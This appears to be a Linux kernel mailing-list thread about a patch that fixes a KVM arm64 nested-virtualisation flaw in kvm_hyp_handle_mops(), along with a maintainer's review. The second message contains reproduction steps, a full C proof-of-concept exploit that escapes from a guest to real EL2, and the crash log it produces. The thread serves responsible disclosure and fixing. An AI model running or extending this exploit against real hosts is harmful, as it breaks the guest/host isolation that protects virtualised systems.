* [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
@ 2026-06-16 11:49 Weiming Shi
2026-06-16 12:03 ` Weiming Shi
2026-06-16 20:14 ` Oliver Upton
0 siblings, 2 replies; 3+ messages in thread
From: Weiming Shi @ 2026-06-16 11:49 UTC (permalink / raw)
To: Marc Zyngier, Oliver Upton, Catalin Marinas, Will Deacon
Cc: Joey Gouly, Steffen Eiden, Suzuki K Poulose, Zenghui Yu,
Andrew Morton, Jakub Kicinski, Bjorn Andersson, Mark Rutland,
Kristina Martsenko, linux-arm-kernel, kvmarm, Zhong Wang,
Xuanqing Shi, Weiming Shi
When a nested virtualisation guest is running its virtual EL2 (vEL2),
fixup_guest_exit() rewrites vcpu_cpsr() to the guest's virtual exception
level: a hardware PSTATE.M of EL1{t,h} is presented as EL2{t,h}. The
hardware, however, executes vEL2 at EL1.
kvm_hyp_handle_mops() runs on the fast guest re-entry path, where it
clears the single-step bit and restores SPSR_EL2 directly from
vcpu_cpsr():
*vcpu_cpsr(vcpu) &= ~DBG_SPSR_SS;
write_sysreg_el2(*vcpu_cpsr(vcpu), SYS_SPSR);
For a guest hypervisor this writes the vEL2 view (PSTATE.M == EL2h) into
the hardware SPSR_EL2 without translating it back. The fast path re-enters
the guest via __guest_enter()/ERET without going through
__sysreg_restore_el2_return_state(), so neither to_hw_pstate() nor the
"return to a less privileged mode" safety check there (which would set
PSR_IL_BIT) is applied. The ERET therefore restores PSTATE.M = EL2h and
re-enters the guest at the real EL2 with a guest-controlled ELR, escaping
stage-2 and the guest/host boundary.
This is reachable on a kernel with FEAT_MOPS running a KVM nested guest
(kvm-arm.mode=nested): KVM sets HCRX_EL2.MCE2, which the guest hypervisor
cannot clear for its own context (is_nested_ctxt() is false), so a vEL2
MOPS exception is taken to the host and dispatched to kvm_hyp_handle_mops()
with VCPU_IN_HYP_CONTEXT set.
Translate EL2{t,h} back to EL1{t,h} before writing SPSR_EL2, mirroring
kvm_hyp_handle_eret(). For non-nested guests vcpu_cpsr() never holds an
EL2 mode, so the translation is a no-op and behaviour is unchanged.
Fixes: 2de451a329cf ("KVM: arm64: Add handler for MOPS exceptions")
Assisted-by: Claude:claude-opus-4-8
Reported-by: Zhong Wang <wangzhong.c0ss4ck@bytedance.com>
Reported-by: Xuanqing Shi <shixuanqing.11@bytedance.com>
Signed-off-by: Weiming Shi <bestswngs@gmail.com>
---
arch/arm64/kvm/hyp/include/hyp/switch.h | 23 ++++++++++++++++++++++-
1 file changed, 22 insertions(+), 1 deletion(-)
diff --git a/arch/arm64/kvm/hyp/include/hyp/switch.h b/arch/arm64/kvm/hyp/include/hyp/switch.h
index e9b36a3b27bbc..a6b7963ddbf0b 100644
--- a/arch/arm64/kvm/hyp/include/hyp/switch.h
+++ b/arch/arm64/kvm/hyp/include/hyp/switch.h
@@ -448,6 +448,8 @@ static inline bool __populate_fault_info(struct kvm_vcpu *vcpu)
static inline bool kvm_hyp_handle_mops(struct kvm_vcpu *vcpu, u64 *exit_code)
{
+ u64 spsr, mode;
+
*vcpu_pc(vcpu) = read_sysreg_el2(SYS_ELR);
arm64_mops_reset_regs(vcpu_gp_regs(vcpu), vcpu->arch.fault.esr_el2);
write_sysreg_el2(*vcpu_pc(vcpu), SYS_ELR);
@@ -457,7 +459,26 @@ static inline bool kvm_hyp_handle_mops(struct kvm_vcpu *vcpu, u64 *exit_code)
* instruction.
*/
*vcpu_cpsr(vcpu) &= ~DBG_SPSR_SS;
- write_sysreg_el2(*vcpu_cpsr(vcpu), SYS_SPSR);
+
+ /*
+ * For a guest hypervisor, vcpu_cpsr() holds the vEL2 view
+ * (PSTATE.M == EL2h) installed by fixup_guest_exit(), but vEL2
+ * runs at EL1. Translate it back before restoring SPSR_EL2, as in
+ * kvm_hyp_handle_eret().
+ */
+ spsr = *vcpu_cpsr(vcpu);
+ mode = spsr & (PSR_MODE_MASK | PSR_MODE32_BIT);
+ switch (mode) {
+ case PSR_MODE_EL2t:
+ mode = PSR_MODE_EL1t;
+ break;
+ case PSR_MODE_EL2h:
+ mode = PSR_MODE_EL1h;
+ break;
+ }
+ spsr = (spsr & ~(PSR_MODE_MASK | PSR_MODE32_BIT)) | mode;
+
+ write_sysreg_el2(spsr, SYS_SPSR);
return true;
}
--
2.43.0
^ permalink raw reply related [flat|nested] 3+ messages in thread
* Re: [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
2026-06-16 11:49 [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Weiming Shi
@ 2026-06-16 12:03 ` Weiming Shi
2026-06-16 20:14 ` Oliver Upton
1 sibling, 0 replies; 3+ messages in thread
From: Weiming Shi @ 2026-06-16 12:03 UTC (permalink / raw)
To: Marc Zyngier, Oliver Upton, Catalin Marinas, Will Deacon
Cc: Joey Gouly, Steffen Eiden, Suzuki K Poulose, Zenghui Yu,
Andrew Morton, Jakub Kicinski, Bjorn Andersson, Mark Rutland,
Kristina Martsenko, linux-arm-kernel, kvmarm, Zhong Wang,
Xuanqing Shi
Reproduction Steps:
1. prepare arm64 kernel image
```
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- defconfig
./scripts/config -e VIRTUALIZATION -e KVM
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- olddefconfig
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- -j$(nproc) Image
make ARCH=arm64 headers_install INSTALL_HDR_PATH=/tmp/khdr
```
2. prepare qemu + initramfs
3. boot qemu with the kernel image
```
qemu-system-aarch64 \
-machine virt,virtualization=on,gic-version=3 -cpu max -accel tcg \
-smp 2 -m 2G -kernel arch/arm64/boot/Image -initrd initramfs.cpio.gz \
-append "console=ttyAMA0 kvm-arm.mode=nested rdinit=/init panic=-1 oops=panic" \
-nographic -no-reboot
```
PoC:
```
/*
* PoC: kvm_hyp_handle_mops SPSR_EL2 privilege escalation (EL1 -> EL2)
*
* Demonstrates that kvm_hyp_handle_mops writes un-translated PSR_MODE_EL2h
* into hardware SPSR_EL2 on the fast-reentry path, allowing a nested guest
* to escape to real EL2 after an EC_MOPS trap.
*
* Build: aarch64-linux-gnu-gcc -static -O0 -o poc_mops poc_mops_clean.c
* Run: sudo ./poc_mops
*
* Expected result on vulnerable kernel: HYP panic with PS:00000009 (EL2h)
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <errno.h>
#include <linux/kvm.h>
#define KVM_ARM_VCPU_HAS_EL2 7
#define PSR_MODE_EL1h 0x00000005
#define PSR_MODE_EL2h 0x00000009
#define ARM64_CORE_REG(u32_off) (0x6030000000100000ULL | (uint64_t)(u32_off))
#define REG_X(n) ARM64_CORE_REG((n) * 2)
#define REG_SP ARM64_CORE_REG(62)
#define REG_PC ARM64_CORE_REG(64)
#define REG_PSTATE ARM64_CORE_REG(66)
#define GUEST_MEM_SIZE (64 * 1024 * 1024)
#define GUEST_CODE_ADDR 0x40000000ULL
#define GUEST_STACK_TOP (GUEST_CODE_ADDR + GUEST_MEM_SIZE - 0x1000)
#define MMIO_ADDR 0x10000000ULL
static int kvm_set_one_reg(int fd, uint64_t id, uint64_t val)
{
struct kvm_one_reg r = { .id = id, .addr = (uint64_t)&val };
return ioctl(fd, KVM_SET_ONE_REG, &r);
}
static int kvm_get_one_reg(int fd, uint64_t id, uint64_t *val)
{
struct kvm_one_reg r = { .id = id, .addr = (uint64_t)val };
return ioctl(fd, KVM_GET_ONE_REG, &r);
}
static void die(const char *msg) { perror(msg); exit(1); }
/*
* Guest code (runs at virtual EL2h).
*
* Triggers EC_MOPS by executing CPYP (prologue, large size so it doesn't
* complete in prologue phase) followed immediately by CPYE (epilogue).
* The CPU detects PSTATE.MOPS_STATE mismatch and traps.
*
* kvm_hyp_handle_mops resets PC -= 8 (for epilogue) and writes vcpu_cpsr
* (which contains EL2h after fixup_guest_exit reverse translation) directly
* to HW SPSR_EL2 without forward translation. On eret, the CPU enters
* real EL2h at the guest PC, causing an instruction abort (no EL2 mapping
* for guest addresses) -> HYP panic.
*
* Layout (offsets from GUEST_CODE_ADDR):
* +0x00 setup x0,x1,x2,x3
* +0x10 movz x9, #0
* +0x14 mrs x10, CurrentEL ; record EL before
* +0x18 str x10, [x3] ; MMIO exit #1
* +0x1C b +16 ; jump to cpyp at +0x2C
* +0x20 nop
* +0x24 nop
* +0x28 mrs x11, CurrentEL ; <-- RESET LANDS HERE (0x30-8)
* +0x2C cpyp [x0]!, [x1]!, x2!
* +0x30 cpye [x0]!, [x1]!, x2! ; EC_MOPS trap
* +0x34 str x11, [x3] ; MMIO exit #2 (after 2nd pass)
* +0x38 b . ; done
*/
static const uint32_t guest_code[] = {
0xd2a80200, /* +0x00 movz x0, #0x4010, lsl #16 (dest = 0x40100000) */
0xd2a80401, /* +0x04 movz x1, #0x4020, lsl #16 (src = 0x40200000) */
0xd2a00202, /* +0x08 movz x2, #0x10, lsl #16 (size = 1MB) */
0xd2a20003, /* +0x0C movz x3, #0x1000, lsl #16 (MMIO = 0x10000000) */
0xd2800009, /* +0x10 movz x9, #0 */
0xd538424a, /* +0x14 mrs x10, CurrentEL */
0xf900006a, /* +0x18 str x10, [x3] */
0x14000004, /* +0x1C b +16 -> +0x2C */
0xd503201f, /* +0x20 nop */
0xd503201f, /* +0x24 nop */
0xd538424b, /* +0x28 mrs x11, CurrentEL (AFTER eret) */
0x1d010440, /* +0x2C cpyp [x0]!, [x1]!, x2! */
0x1d810440, /* +0x30 cpye [x0]!, [x1]!, x2! -> EC_MOPS */
0xf900006b, /* +0x34 str x11, [x3] */
0x14000000, /* +0x38 b . */
};
int main(void)
{
int kvm_fd, vm_fd, vcpu_fd, ret;
struct kvm_vcpu_init vcpu_init = {};
struct kvm_run *run;
void *guest_mem;
setbuf(stdout, NULL);
setbuf(stderr, NULL);
printf("[*] kvm_hyp_handle_mops SPSR privilege escalation PoC\n");
printf("[*] Target: Linux kernel with CONFIG_KVM_ARM_NV + FEAT_MOPS\n\n");
kvm_fd = open("/dev/kvm", O_RDWR);
if (kvm_fd < 0) die("open /dev/kvm");
vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
if (vm_fd < 0) die("KVM_CREATE_VM");
/* Guest memory */
guest_mem = mmap(NULL, GUEST_MEM_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (guest_mem == MAP_FAILED) die("mmap");
struct kvm_userspace_memory_region region = {
.slot = 0,
.guest_phys_addr = GUEST_CODE_ADDR,
.memory_size = GUEST_MEM_SIZE,
.userspace_addr = (uint64_t)guest_mem,
};
if (ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION, &region) < 0)
die("KVM_SET_USER_MEMORY_REGION");
memcpy(guest_mem, guest_code, sizeof(guest_code));
/* Create vCPU with nested virtualization */
vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
if (vcpu_fd < 0) die("KVM_CREATE_VCPU");
if (ioctl(vm_fd, KVM_ARM_PREFERRED_TARGET, &vcpu_init) < 0)
die("KVM_ARM_PREFERRED_TARGET");
vcpu_init.features[0] |= (1 << KVM_ARM_VCPU_HAS_EL2);
if (ioctl(vcpu_fd, KVM_ARM_VCPU_INIT, &vcpu_init) < 0) {
perror("KVM_ARM_VCPU_INIT with HAS_EL2");
printf("[-] Nested virtualization not supported.\n");
return 1;
}
printf("[+] vCPU created with nested virt (NV)\n");
/* GICv3 (required before KVM_RUN) */
{
struct kvm_create_device gic_dev = { .type = KVM_DEV_TYPE_ARM_VGIC_V3 };
if (ioctl(vm_fd, KVM_CREATE_DEVICE, &gic_dev) < 0)
die("KVM_CREATE_DEVICE GICv3");
uint64_t dist = 0x08000000ULL, redist = 0x080A0000ULL;
struct kvm_device_attr attr = {
.group = KVM_DEV_ARM_VGIC_GRP_ADDR,
.attr = KVM_VGIC_V3_ADDR_TYPE_DIST,
.addr = (uint64_t)&dist,
};
ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
attr.attr = KVM_VGIC_V3_ADDR_TYPE_REDIST;
attr.addr = (uint64_t)&redist;
ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
attr = (struct kvm_device_attr){
.group = KVM_DEV_ARM_VGIC_GRP_CTRL,
.attr = KVM_DEV_ARM_VGIC_CTRL_INIT,
};
ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
printf("[+] GICv3 initialized\n");
}
/* Set vCPU state: start at virtual EL2h */
kvm_set_one_reg(vcpu_fd, REG_PC, GUEST_CODE_ADDR);
kvm_set_one_reg(vcpu_fd, REG_SP, GUEST_STACK_TOP);
if (kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL2h) < 0) {
printf("[!] Cannot set EL2h, falling back to EL1h\n");
kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL1h);
}
printf("[+] vCPU: PC=0x%llx PSTATE=EL2h SP=0x%llx\n",
(unsigned long long)GUEST_CODE_ADDR,
(unsigned long long)GUEST_STACK_TOP);
/* Map kvm_run */
int run_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
run = mmap(NULL, run_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpu_fd, 0);
if (run == MAP_FAILED) die("mmap vcpu");
/* Execute guest */
printf("\n[*] Running guest. If kernel panics -> vulnerability confirmed.\n\n");
int mmio_count = 0;
uint64_t el_before = 0, el_after = 0;
for (int i = 0; i < 100; i++) {
ret = ioctl(vcpu_fd, KVM_RUN, 0);
if (ret < 0) {
printf("[-] KVM_RUN failed: %s (errno=%d)\n", strerror(errno), errno);
break;
}
switch (run->exit_reason) {
case KVM_EXIT_MMIO:
if (run->mmio.is_write && run->mmio.phys_addr == MMIO_ADDR) {
uint64_t val = 0;
memcpy(&val, run->mmio.data, run->mmio.len);
mmio_count++;
printf("[+] MMIO #%d: CurrentEL = 0x%llx (EL%lld)\n",
mmio_count, (unsigned long long)val, (long long)(val >> 2) & 3);
if (mmio_count == 1) el_before = (val >> 2) & 3;
if (mmio_count == 2) { el_after = (val >> 2) & 3; goto results; }
}
break;
case KVM_EXIT_INTERNAL_ERROR:
printf("[!] INTERNAL_ERROR: safety assert may have caught EL2h SPSR\n");
goto done;
case KVM_EXIT_FAIL_ENTRY:
printf("[-] FAIL_ENTRY: 0x%llx\n",
(unsigned long long)run->fail_entry.hardware_entry_failure_reason);
goto done;
default:
printf("[*] exit_reason=%d (iter %d)\n", run->exit_reason, i);
break;
}
}
printf("[-] Max iterations reached without result.\n");
goto done;
results:
printf("\n========== RESULTS ==========\n");
printf(" EL before MOPS: EL%lld\n", (long long)el_before);
printf(" EL after MOPS: EL%lld\n", (long long)el_after);
printf("=============================\n\n");
if (el_after > el_before)
printf("[!!!] PRIVILEGE ESCALATION: EL%lld -> EL%lld\n",
(long long)el_before, (long long)el_after);
else
printf("[+] No escalation observed in guest registers.\n");
done:
printf("\n[*] Check dmesg for HYP panic:\n");
printf(" dmesg | grep -i 'hyp panic\\|PS:.*0009'\n");
printf("[*] If PS:00000009 appears -> SPSR contained EL2h -> vuln confirmed.\n");
close(vcpu_fd);
close(vm_fd);
close(kvm_fd);
munmap(guest_mem, GUEST_MEM_SIZE);
munmap(run, run_size);
return 0;
}
```
Crash log:
```
========== FatalMOPS dynamic test (L1 host) ==========
[*] CPU ID registers (FEAT_MOPS bits[19:16] of isar2; FEAT_NV bits[27:24] of mmfr2):
/sys/devices/system/cpu/cpu0/regs/identification/id_aa64isar2_el1: (absent)
/sys/devices/system/cpu/cpu0/regs/identification/id_aa64mmfr2_el1: (absent)
[+] /dev/kvm present
[*] dmesg nested-virt lines:
[*] launching /poc ...
[*] FatalMOPS PoC: kvm_hyp_handle_mops vEL2->EL2 escape
[+] vCPU created with nested virt (HAS_EL2)
[+] GICv3 initialized
[+] vCPU starts at virtual EL2h
[*] Running guest. Vulnerable kernel -> HYP panic expected.
[+] MMIO #1: CurrentEL=EL2
[ 3.326956] Kernel panic - not syncing: HYP panic:
[ 3.326956] PS:00000009 PC:0000000040000028 ESR:86000005
[ 3.326956] FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
[ 3.326956] VCPU:000000006f4e5727
[ 3.342728] CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
[ 3.349460] Hardware name: linux,dummy-virt (DT)
[ 3.353136] Call trace:
[ 3.355241] show_stack+0x18/0x24 (C)
[ 3.358652] dump_stack_lvl+0x34/0x8c
[ 3.361515] dump_stack+0x18/0x24
[ 3.364085] vpanic+0x47c/0x4dc
[ 3.366527] do_panic_on_target_cpu+0x0/0x1c
[ 3.369782] kvm_unexpected_el2_exception+0x0/0x3c0
[ 3.373494] hyp_panic+0x0/0x80
[ 3.375940] kvm_arm_vcpu_enter_exit+0x64/0x94
[ 3.379372] kvm_arch_vcpu_ioctl_run+0x27c/0x8f8
[ 3.382919] kvm_vcpu_ioctl+0x174/0xa38
[ 3.385894] __arm64_sys_ioctl+0xac/0x104
[ 3.389105] invoke_syscall+0x54/0x10c
[ 3.392015] el0_svc_common.constprop.0+0x40/0xe0
[ 3.395653] do_el0_svc+0x1c/0x28
[ 3.398236] el0_svc+0x38/0x11c
[ 3.400681] el0t_64_sync_handler+0xa0/0xe4
[ 3.403872] el0t_64_sync+0x198/0x19c
[ 3.407083] SMP: stopping secondary CPUs
[ 3.410661] Kernel Offset: 0x127592c00000 from 0xffff800080000000
[ 3.415585] PHYS_OFFSET: 0x40000000
[ 3.418668] CPU features: 0x00000000,0034e00b,ffeec7e1,9d7e7f3f
[ 3.423170] Memory Limit: none
```
Call trace after symbol decoding:
```
Kernel panic - not syncing: HYP panic:
PS:00000009 PC:0000000040000028 ESR:86000005
FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
VCPU:000000006f4e5727
CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
Call trace:
show_stack (arch/arm64/kernel/stacktrace.c:499)
dump_stack_lvl (lib/dump_stack.c:94 120)
dump_stack (lib/dump_stack.c:129)
vpanic (kernel/panic.c:650)
do_panic_on_target_cpu (kernel/panic.c:341)
kvm_unexpected_el2_exception (arch/arm64/kvm/hyp/include/hyp/switch.h:964
→ arch/arm64/kvm/hyp/vhe/switch.c:688)
hyp_panic (arch/arm64/kvm/hyp/vhe/switch.c:678)
kvm_arm_vcpu_enter_exit (arch/arm64/kvm/arm.c:1227)
kvm_arch_vcpu_ioctl_run (arch/arm64/kvm/arm.c:1324)
kvm_vcpu_ioctl (virt/kvm/kvm_main.c:4470)
__arm64_sys_ioctl (fs/ioctl.c:51 597 583)
invoke_syscall (arch/arm64/kernel/syscall.c:35 49)
el0_svc_common.constprop.0 (arch/arm64/kernel/syscall.c:121)
do_el0_svc (arch/arm64/kernel/syscall.c:140)
el0_svc (arch/arm64/kernel/entry-common.c:740)
el0t_64_sync_handler (arch/arm64/kernel/entry-common.c:759)
el0t_64_sync (arch/arm64/kernel/entry.S:594)
```
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
2026-06-16 11:49 [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Weiming Shi
2026-06-16 12:03 ` Weiming Shi
@ 2026-06-16 20:14 ` Oliver Upton
1 sibling, 0 replies; 3+ messages in thread
From: Oliver Upton @ 2026-06-16 20:14 UTC (permalink / raw)
To: Weiming Shi
Cc: Marc Zyngier, Catalin Marinas, Will Deacon, Joey Gouly,
Steffen Eiden, Suzuki K Poulose, Zenghui Yu, Andrew Morton,
Jakub Kicinski, Bjorn Andersson, Mark Rutland, Kristina Martsenko,
linux-arm-kernel, kvmarm, Zhong Wang, Xuanqing Shi
Hi Weiming,
Thanks for the fix.
On Tue, Jun 16, 2026 at 07:49:44PM +0800, Weiming Shi wrote:
> When a nested virtualisation guest is running its virtual EL2 (vEL2),
> fixup_guest_exit() rewrites vcpu_cpsr() to the guest's virtual exception
> level: a hardware PSTATE.M of EL1{t,h} is presented as EL2{t,h}. The
> hardware, however, executes vEL2 at EL1.
>
> kvm_hyp_handle_mops() runs on the fast guest re-entry path, where it
> clears the single-step bit and restores SPSR_EL2 directly from
> vcpu_cpsr():
>
> *vcpu_cpsr(vcpu) &= ~DBG_SPSR_SS;
> write_sysreg_el2(*vcpu_cpsr(vcpu), SYS_SPSR);
>
> For a guest hypervisor this writes the vEL2 view (PSTATE.M == EL2h) into
> the hardware SPSR_EL2 without translating it back. The fast path re-enters
> the guest via __guest_enter()/ERET without going through
> __sysreg_restore_el2_return_state(), so neither to_hw_pstate() nor the
> "return to a less privileged mode" safety check there (which would set
> PSR_IL_BIT) is applied. The ERET therefore restores PSTATE.M = EL2h and
> re-enters the guest at the real EL2 with a guest-controlled ELR, escaping
> stage-2 and the guest/host boundary.
>
> This is reachable on a kernel with FEAT_MOPS running a KVM nested guest
> (kvm-arm.mode=nested): KVM sets HCRX_EL2.MCE2, which the guest hypervisor
> cannot clear for its own context (is_nested_ctxt() is false), so a vEL2
> MOPS exception is taken to the host and dispatched to kvm_hyp_handle_mops()
> with VCPU_IN_HYP_CONTEXT set.
>
> Translate EL2{t,h} back to EL1{t,h} before writing SPSR_EL2, mirroring
> kvm_hyp_handle_eret(). For non-nested guests vcpu_cpsr() never holds an
> EL2 mode, so the translation is a no-op and behaviour is unchanged.
The changelog is unnecessarily verbose, instead:
kvm_hyp_handle_mops() resets the single-step state machine as part of
rewinding state for a MOPS exception by modifying vcpu_cpsr() and
writing the result directly into hardware.
In the case of nested virtualization, vcpu_cpsr() is a synthetic value
such that the rest of KVM can deal with vEL2 cleanly. That means the
value requires translation before being written into hardware, which is
unfortunately missing from the MOPS handler.
Fix it by directly modifying SPSR_EL2 and avoiding the synthetic state
altogether, which will be resynchronized on the next 'full' exit back
to KVM.
Also:
Cc: stable@vger.kernel.org
Definitely meets the bar :)
> Fixes: 2de451a329cf ("KVM: arm64: Add handler for MOPS exceptions")
> Assisted-by: Claude:claude-opus-4-8
> Reported-by: Zhong Wang <wangzhong.c0ss4ck@bytedance.com>
> Reported-by: Xuanqing Shi <shixuanqing.11@bytedance.com>
> Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> ---
> arch/arm64/kvm/hyp/include/hyp/switch.h | 23 ++++++++++++++++++++++-
> 1 file changed, 22 insertions(+), 1 deletion(-)
>
> diff --git a/arch/arm64/kvm/hyp/include/hyp/switch.h b/arch/arm64/kvm/hyp/include/hyp/switch.h
> index e9b36a3b27bbc..a6b7963ddbf0b 100644
> --- a/arch/arm64/kvm/hyp/include/hyp/switch.h
> +++ b/arch/arm64/kvm/hyp/include/hyp/switch.h
> @@ -448,6 +448,8 @@ static inline bool __populate_fault_info(struct kvm_vcpu *vcpu)
>
> static inline bool kvm_hyp_handle_mops(struct kvm_vcpu *vcpu, u64 *exit_code)
> {
> + u64 spsr, mode;
> +
> *vcpu_pc(vcpu) = read_sysreg_el2(SYS_ELR);
> arm64_mops_reset_regs(vcpu_gp_regs(vcpu), vcpu->arch.fault.esr_el2);
> write_sysreg_el2(*vcpu_pc(vcpu), SYS_ELR);
> @@ -457,7 +459,26 @@ static inline bool kvm_hyp_handle_mops(struct kvm_vcpu *vcpu, u64 *exit_code)
> * instruction.
> */
> *vcpu_cpsr(vcpu) &= ~DBG_SPSR_SS;
> - write_sysreg_el2(*vcpu_cpsr(vcpu), SYS_SPSR);
> +
> + /*
> + * For a guest hypervisor, vcpu_cpsr() holds the vEL2 view
> + * (PSTATE.M == EL2h) installed by fixup_guest_exit(), but vEL2
> + * runs at EL1. Translate it back before restoring SPSR_EL2, as in
> + * kvm_hyp_handle_eret().
> + */
> + spsr = *vcpu_cpsr(vcpu);
> + mode = spsr & (PSR_MODE_MASK | PSR_MODE32_BIT);
> + switch (mode) {
> + case PSR_MODE_EL2t:
> + mode = PSR_MODE_EL1t;
> + break;
> + case PSR_MODE_EL2h:
> + mode = PSR_MODE_EL1h;
> + break;
> + }
> + spsr = (spsr & ~(PSR_MODE_MASK | PSR_MODE32_BIT)) | mode;
> +
> + write_sysreg_el2(spsr, SYS_SPSR);
As I allude to in the modified changelog, I'd rather we just manipulate
the hardware value of SPSR_EL2 directly. We already do this in
kvm_hyp_handle_eret():
spsr = read_sysreg_el2(SYS_SPSR);
write_sysreg_el2(spsr & ~DBG_SPSR_SS, SYS_SPSR);
Thanks,
Oliver
^ permalink raw reply [flat|nested] 3+ messages in thread